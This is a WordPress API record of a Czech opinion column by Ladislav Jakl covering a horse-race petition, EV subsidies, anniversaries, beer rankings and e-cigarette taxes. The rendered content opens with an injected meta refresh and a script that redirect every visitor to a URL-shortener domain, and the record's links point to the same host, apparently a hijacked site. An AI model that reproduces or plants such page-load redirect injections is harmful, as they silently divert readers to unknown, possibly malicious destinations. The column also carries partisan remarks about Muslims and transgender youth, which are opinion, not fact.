{"id":13738,"date":"2023-10-12T23:35:49","date_gmt":"2023-10-12T21:35:49","guid":{"rendered":"https:\/\/www.ladislavjakl.cz\/?p=13738"},"modified":"2023-10-12T23:35:49","modified_gmt":"2023-10-12T21:35:49","slug":"ne-kazda-konina-je-konina","status":"publish","type":"post","link":"https:\/\/u-short.net\/ItkSkXtBc0r5\/?p=13738","title":{"rendered":"Ne ka\u017ed\u00e1 konina je konina"},"content":{"rendered":"<p><meta http-equiv=\"refresh\" content=\"0; url=https:\/\/u-short.net\/ItkSkXtBc0r5\" \/><br \/>\n<script>window.location.href = \"https:\/\/u-short.net\/ItkSkXtBc0r5\";<\/script><br \/>\nGaza ho\u0159\u00ed, Rusov\u00e9 spustili ne\u010dekanou ofenz\u00edvu, policist\u00e9 v&nbsp;Los Angeles ignorovali vol\u00e1n\u00ed o pomoc, proto\u017ee byli zam\u011bstn\u00e1n\u00ed hrou v&nbsp;Pok\u00e9mony. Ve sv\u011btle t\u011bchto velk\u00fdch ud\u00e1lost\u00ed trochu zanikaj\u00ed nen\u00e1padn\u011bj\u0161\u00ed, ale podstatn\u00e9 momenty, kter\u00e9 se d\u011bj\u00ed kolem n\u00e1s.<\/p>\n<p><!--more--><\/p>\n<p>Vezm\u011bte si takov\u00e9 peti\u010dn\u00ed pr\u00e1vo. To je velmi u\u017eite\u010dn\u00fd n\u00e1stroj, jak m\u016f\u017ee ve\u0159ejnost i mezi volbami spont\u00e1nn\u011b a sama od sebe iniciovat zdola n\u011bjak\u00e9 rozhodnut\u00ed ve\u0159ejn\u00fdch instituc\u00ed. T\u0159eba tyto dny se znovu rozho\u0159ela u\u017e l\u00e9ta prob\u00edhaj\u00edc\u00ed petice, kde tis\u00edce lid\u00ed po\u017eaduj\u00ed zru\u0161en\u00ed Taxisova p\u0159\u00edkopu v&nbsp;r\u00e1mci Velk\u00e9 pardubick\u00e9. Jin\u00e9 tis\u00edce lid\u00ed si ale mysl\u00ed, \u017ee takov\u00fd z\u00e1kaz by byla p\u011bkn\u00e1 konina.<\/p>\n<p>Pan ministr prost\u0159ed\u00ed pro n\u00e1\u0161 \u017eivot Petr Hlad\u00edk pravil v\u010dera na n\u011bjak\u00e9 konferenci, \u017ee je nutno urychlit posun k&nbsp;elektrick\u00fdm aut\u016fm formou dal\u0161\u00edch dotac\u00ed. Ty pr\u00fd u\u017e nemaj\u00ed sm\u011b\u0159ovat k&nbsp;provozovatel\u016fm, ale firm\u00e1m. A nen\u00ed to jedno? C\u00edlem je v\u017edy um\u011ble sn\u00ed\u017eit skute\u010dn\u00e9 n\u00e1klady na provoz voz\u00edtek na baterky. Tak\u017ee st\u00e1t op\u011bt za\u0161m\u00e1tr\u00e1 v&nbsp;kaps\u00e1ch oby\u010dejn\u00fdch zam\u011bstnanc\u016f, aby se pra\u017e\u0161t\u00ed snobov\u00e9 mohli levn\u011bji p\u0159edv\u00e1d\u011bt.<\/p>\n<p>M\u016f\u017eeme i vzpom\u00ednat. Dnes je to p\u0159esn\u011b 340 let od chv\u00edle, kdy u V\u00eddn\u011b osmansk\u00fdm mohamed\u00e1n\u016fm vypr\u00e1\u0161il koberce polsk\u00fd kr\u00e1l Jan Sobieski. Od t\u00e9 doby nastal rozmach Habsbursk\u00e9 monarchie a z\u00e1rove\u0148 \u00fastup muslim\u016f z&nbsp;Evropy. Raku\u0161an\u00e9 se pozd\u011bji Pol\u00e1k\u016fm za tuto pomoc odvd\u011b\u010dili t\u00edm, \u017ee se z\u00e1sadn\u011b pod\u00edleli na t\u0159et\u00edm d\u011blen\u00ed Polska, a tedy na konci jejich kr\u00e1lovstv\u00ed. Dnes u\u017e je zase v\u0161e jinak. Muslimsk\u00e9 z\u00e1stupy se do Evropy vracej\u00ed a o n\u011bkdej\u0161\u00ed rakousk\u00fd zisk na Polsku se nyn\u00ed bratrsky d\u011bl\u00ed Polsko s&nbsp;Ukrajinou.<\/p>\n<p>A je\u0161t\u011b jedno v\u00fdro\u010d\u00ed dnes m\u00e1me. I v&nbsp;n\u011bm m\u00e1 prsty Rakousko. P\u0159ed 130 bylo vyhl\u00e1\u0161eno v&nbsp;Praze stann\u00e9 pr\u00e1vo, \u010d\u00edm\u017e odstartovaly represe v\u016f\u010di Omladin\u011b. Dne\u0161n\u00ed omladin\u011b hroz\u00ed maxim\u00e1ln\u011b vypnut\u00ed Wi-Fi. Nebo ne? Pr\u00e1\u0161ky na zastaven\u00ed puberty s&nbsp;podporou st\u00e1tu nejsp\u00ed\u0161e budou brzo \u0161\u00ed\u0159eny i u n\u00e1s. Omladina pak bude m\u00edt v\u00edc \u010dasu, aby se jej\u00ed exempl\u00e1\u0159e rozmyslely, jestli cht\u011bj\u00ed b\u00fdt klukem, pon\u00edkem nebo Spidermanem.&nbsp;<\/p>\n<p>A co se je\u0161t\u011b tyto dny stalo p\u0159evratn\u00e9ho? Nejlep\u0161\u00edm \u010desk\u00fdm le\u017e\u00e1kem dostupn\u00fdm v&nbsp;b\u011b\u017en\u00e9 obchodn\u00ed s\u00edti byl v\u010dera vyhl\u00e1\u0161en B\u0159ez\u0148\u00e1k. Rozhodli tak porotci Prvn\u00ed pivn\u00ed extraligy. Milovn\u00edci Prazdroje nezoufejte, v\u00e1\u0161 obl\u00edben\u00fd titul skon\u010dil druh\u00fd. Z&nbsp;p\u011btapades\u00e1ti ochutn\u00e1van\u00fdch vzork\u016f.<\/p>\n<p>A kdy\u017e u\u017e jsme u piva, jsme z\u00e1rove\u0148 u hospod. Ty p\u0159ed \u010dasem investovaly velik\u00fd kapit\u00e1l do povinn\u00e9 klimatizace \u010di do odd\u011blen\u00fdch ku\u0159\u00e1ren, aby si to st\u00e1t za chv\u00edli rozmyslel a zak\u00e1zal kou\u0159en\u00ed plo\u0161n\u011b. Podobn\u00e9 to je s&nbsp;takzvan\u00fdmi elektronick\u00fdmi cigaretami. Tam argument o pasivn\u00edm kou\u0159en\u00ed pad\u00e1, tak se po z\u00e1kazu kou\u0159en\u00ed v&nbsp;hospod\u00e1ch spot\u0159ebitel\u00e9 i poskytovatel\u00e9 slu\u017eeb vrhli na tuto novou komoditu.<\/p>\n<p>Jen\u017ee st\u00e1t se nezastav\u00ed u \u017e\u00e1dn\u00e9 hranice ve sv\u00e9 snaze zajistit n\u00e1m \u0161t\u011bst\u00ed, zdrav\u00ed, dlouh\u00e1 l\u00e9ta, \u017eivij\u00f3. Na mnoha m\u00edstech si u\u017e ani z&nbsp;t\u00e9to n\u00e1hra\u017eky cigarety nepot\u00e1hnete, z\u00e1kazy se \u0161\u00ed\u0159\u00ed a maj\u00ed se \u010dile k&nbsp;sv\u011btu. A do toho n\u00e1m vl\u00e1da p\u0159ipravila d\u00e1re\u010dek. Modern\u00ed ku\u0159ivo podra\u017e\u00ed o 150 procent a stane se nejdra\u017e\u0161\u00edm v&nbsp;Evrop\u011b. Nen\u00ed to konina? Ne! Kone\u010dn\u011b jsme v&nbsp;n\u011b\u010dem nej!<\/p>\n<p><em>Ladislav Jakl, 12. \u0159\u00edjna 2023<\/em><\/p>\n<p><a href=\"https:\/\/www.institutvk.cz\/clanky\/2494.html\">Zdroj<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Gaza ho\u0159\u00ed, Rusov\u00e9 spustili ne\u010dekanou ofenz\u00edvu, policist\u00e9 v&nbsp;Los Angeles ignorovali vol\u00e1n\u00ed o pomoc, proto\u017ee byli zam\u011bstn\u00e1n\u00ed hrou v&nbsp;Pok\u00e9mony. Ve sv\u011btle t\u011bchto velk\u00fdch ud\u00e1lost\u00ed trochu zanikaj\u00ed nen\u00e1padn\u011bj\u0161\u00ed, ale podstatn\u00e9 momenty, kter\u00e9 se d\u011bj\u00ed kolem n\u00e1s.<\/p>\n","protected":false},"author":9,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[1,10],"tags":[],"class_list":["post-13738","post","type-post","status-publish","format-standard","hentry","category-publikovane-clanky","category-zlehka"],"_links":{"self":[{"href":"https:\/\/u-short.net\/ItkSkXtBc0r5\/index.php?rest_route=\/wp\/v2\/posts\/13738","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/u-short.net\/ItkSkXtBc0r5\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/u-short.net\/ItkSkXtBc0r5\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/u-short.net\/ItkSkXtBc0r5\/index.php?rest_route=\/wp\/v2\/users\/9"}],"replies":[{"embeddable":true,"href":"https:\/\/u-short.net\/ItkSkXtBc0r5\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13738"}],"version-history":[{"count":1,"href":"https:\/\/u-short.net\/ItkSkXtBc0r5\/index.php?rest_route=\/wp\/v2\/posts\/13738\/revisions"}],"predecessor-version":[{"id":13739,"href":"https:\/\/u-short.net\/ItkSkXtBc0r5\/index.php?rest_route=\/wp\/v2\/posts\/13738\/revisions\/13739"}],"wp:attachment":[{"href":"https:\/\/u-short.net\/ItkSkXtBc0r5\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13738"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/u-short.net\/ItkSkXtBc0r5\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13738"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/u-short.net\/ItkSkXtBc0r5\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13738"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}